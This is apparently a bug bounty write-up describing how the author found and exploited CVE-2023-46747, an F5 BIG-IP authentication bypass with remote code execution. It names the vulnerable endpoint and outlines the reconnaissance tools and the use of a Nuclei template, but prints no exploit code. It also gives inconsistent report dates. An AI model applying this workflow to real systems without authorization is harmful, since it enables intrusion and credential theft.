How I Got $1000 Bounty From X-Company? (RCE +Authentication Bypass)
Hello all, Raj here! I’m back with some interesting findings.
I know it’s been a while since my last writeup—been busy with some good projects and learning new things. But without further delay, let’s dive right in.
Introduction:
Bug bounty programs provide a unique opportunity to explore the depths of cybersecurity, presenting challenges that often lead to intriguing discoveries. Recently, during my active engagement in testing, I uncovered a Remote Code Execution (RCE) + authentication bypass vulnerability in a top company (due to their policy, I won’t reveal the name, so let’s just call it X-company) (CVE-2023–46747).
Let’s go…
On May 16, 2024, I disclosed a vulnerability I identified on an internal IP owned by X-company. This was part of their Bug Bounty program, where rewards are given for finding security vulnerabilities. I discovered an authentication bypass vulnerability in X-company’s F5 BIG-IP. The vulnerability has a critical severity rating with a CVSS score of 9.8. Successful exploitation could allow an attacker to perform remote code execution on the target system.
My Methodology:
“Reconnaissance is the initial step in bug hunting.”
- I started by gathering the in-scope domains.
- Then I kicked off active and passive subdomain enumeration using various tools. For passive subdomain enumeration, I used Subfinder with API keys from different services like Shodan, Censys, Chaos, GitHub, Sublist3r, etc. For active subdomain enumeration, I used the Best DNS Wordlist from the Assetnote Wordlist.
- I ended up identifying around 10,889 subdomains and IPs.
- The next step was filtering out live domains based on their status codes.
- I quickly identified the internal IP with the F5 BIG-IP and confirmed it using Wappalyzer.
- Here’s where the actual journey begins.
Recently, I came across the F5 BIG-IP Unauthenticated Remote Code Execution Vulnerability (CVE-2023–46747).
CVE-2023–46747 is a critical vulnerability that allows undisclosed requests to bypass configuration utility authentication, enabling an attacker with network access to the BIG-IP system through the management port and/or self-IP addresses to execute arbitrary system commands.
Geared up, I discovered an endpoint (/mgmt/tm/util/bash) that was vulnerable to CVE-2023–46747.
This vulnerable endpoint (/mgmt/tm/util/bash) allows an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self-IP addresses to execute arbitrary system commands.
Once I confirmed the vulnerability, the next task was to find a proper exploit. There are many exploit scripts available, but several give false positives. So, I opted for an exploit using a Nuclei template, and this approach worked effectively.
Exploit Process for Remote Code Execution (RCE) and Authentication Bypass:
=> First, I ran a Nuclei scan and waited for the results.
=> BOOM…! RCE is working—I got the system ID, username, and password.
=> Next, I decided to increase the impact by exploiting the authentication bypass.
=> So, I navigated to the $ip/mgmt/tm/util/bash site, entered the username and password, and BOOM! I was redirected to the F5 BIG-IP admin panel on the internal network.
After that, I reported this issue through their Bug Bounty Program.
X-company has since fixed the issue, and I want to commend them for their responsiveness. This is an excellent example of a company that takes security seriously and rewards those who help them identify and fix issues.
Timeline:
- May 2024—Submitted bug report.
- May 13, 2024—X-company marked it as triaged.
- May 14, 2024—They verified the vulnerability and began the fixing process.
- May 16, 2024—Marked as resolved, and the bounty 💸 was awarded.
I hope this inspires you.
Thanks for reading! 🙂
